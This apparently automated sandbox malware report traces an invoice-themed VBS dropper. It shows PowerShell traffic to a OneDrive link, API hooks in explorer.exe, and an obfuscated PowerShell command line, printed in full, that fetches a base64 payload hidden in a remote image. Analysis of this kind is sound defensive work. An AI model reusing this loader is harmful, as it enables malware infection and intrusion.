                                                                                                                                                                                                                                                                2024-04-18 19:11:20 UTC1369INData Raw: 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e
                                                                                                                                                                                                                                                                Data Ascii: .TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4ApC.
                                                                                                                                                                                                                                                                2024-04-18 19:11:20 UTC1369INData Raw: 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab 03
                                                                                                                                                                                                                                                                Data Ascii: VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV
                                                                                                                                                                                                                                                                2024-04-18 19:11:20 UTC1369INData Raw: e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68
                                                                                                                                                                                                                                                                Data Ascii: r7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(h
                                                                                                                                                                                                                                                                2024-04-18 19:11:20 UTC1369INData Raw: ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c
                                                                                                                                                                                                                                                                Data Ascii: HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}
                                                                                                                                                                                                                                                                2024-04-18 19:11:20 UTC1369INData Raw: 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76 91
                                                                                                                                                                                                                                                                Data Ascii: RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imv
                                                                                                                                                                                                                                                                2024-04-18 19:11:20 UTC1369INData Raw: 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90 dd
                                                                                                                                                                                                                                                                Data Ascii: .f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},z
                                                                                                                                                                                                                                                                2024-04-18 19:11:20 UTC1369INData Raw: 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23 08
                                                                                                                                                                                                                                                                Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#
                                                                                                                                                                                                                                                                2024-04-18 19:11:20 UTC1369INData Raw: 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35
                                                                                                                                                                                                                                                                Data Ascii: mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@BH5
                                                                                                                                                                                                                                                                2024-04-18 19:11:20 UTC1369INData Raw: 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2
                                                                                                                                                                                                                                                                Data Ascii: #K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                3192.168.2.44973313.107.139.114433492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-04-18 19:11:25 UTC129OUTGET /download?resid=4E6F63F4C3C86180%21112&authkey=!AJi85Fsyq6pgUBw HTTP/1.1
                                                                                                                                                                                                                                                                Host: onedrive.live.com
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                2024-04-18 19:11:26 UTC1168INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                                Location: https://htdgia.db.files.1drv.com/y4mdZqgHiAYYAMHkXnrzhlBVpfUqBhVsd5wAGw4Vw-FcIqEqjrZkuvsNkUrzqWLbPsiJlKGzXkmWCkwVHVM5OUp0dYYDxy5V6DltP3k0fGt1uqaRVEAsm0uwRw_gf01kPuWcNu-_HVrW44dE_jpuoOVN9Lb6UOuZ28z9zaSImdDybKfffF4JSjXi8kxh_2QVMcQcV914KaXkR1bnb3PSsKvEQ/ma.txt?download&psid=1
                                                                                                                                                                                                                                                                Set-Cookie: E=P:BobfV9tf3Ig=:Ra41qiyf2371S2VVii5RS1Gdb9CFALRt+lfuZIu7Pkg=:F; domain=.live.com; path=/
                                                                                                                                                                                                                                                                Set-Cookie: xid=3426038e-793f-4f90-8f52-9ce131069d27&&ODSP-ODWEB-ODCF&146; domain=.live.com; path=/
                                                                                                                                                                                                                                                                Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                                                                                                Set-Cookie: LD=; domain=.live.com; expires=Thu, 18-Apr-2024 17:31:25 GMT; path=/
                                                                                                                                                                                                                                                                Set-Cookie: wla42=; domain=live.com; expires=Thu, 25-Apr-2024 19:11:26 GMT; path=/
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                X-MSNServer: 5fd6fc6db4-rpcf2
                                                                                                                                                                                                                                                                X-ODWebServer: nameastus2946819-odwebpl
                                                                                                                                                                                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: 0447AA6B47B347698A5B60F1D4B5BBD3 Ref B: BN3EDGE0319 Ref C: 2024-04-18T19:11:25Z
                                                                                                                                                                                                                                                                Date: Thu, 18 Apr 2024 19:11:25 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                Code Manipulations

                                                                                                                                                                                                                                                                User Modules

                                                                                                                                                                                                                                                                Hook Summary

                                                                                                                                                                                                                                                                Function NameHook TypeActive in Processes
                                                                                                                                                                                                                                                                PeekMessageAINLINEexplorer.exe
                                                                                                                                                                                                                                                                PeekMessageWINLINEexplorer.exe
                                                                                                                                                                                                                                                                GetMessageWINLINEexplorer.exe
                                                                                                                                                                                                                                                                GetMessageAINLINEexplorer.exe

                                                                                                                                                                                                                                                                Processes

                                                                                                                                                                                                                                                                Process: explorer.exe, Module: user32.dll
                                                                                                                                                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                                                                                                                                                PeekMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xEA
                                                                                                                                                                                                                                                                PeekMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xEA
                                                                                                                                                                                                                                                                GetMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xEA
                                                                                                                                                                                                                                                                GetMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xEA

                                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                Start time:21:11:12
                                                                                                                                                                                                                                                                Start date:18/04/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs"
                                                                                                                                                                                                                                                                Imagebase:0x7ff6e2c70000
                                                                                                                                                                                                                                                                File size:170'496 bytes
                                                                                                                                                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                                Start time:21:11:14
                                                                                                                                                                                                                                                                Start date:18/04/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTr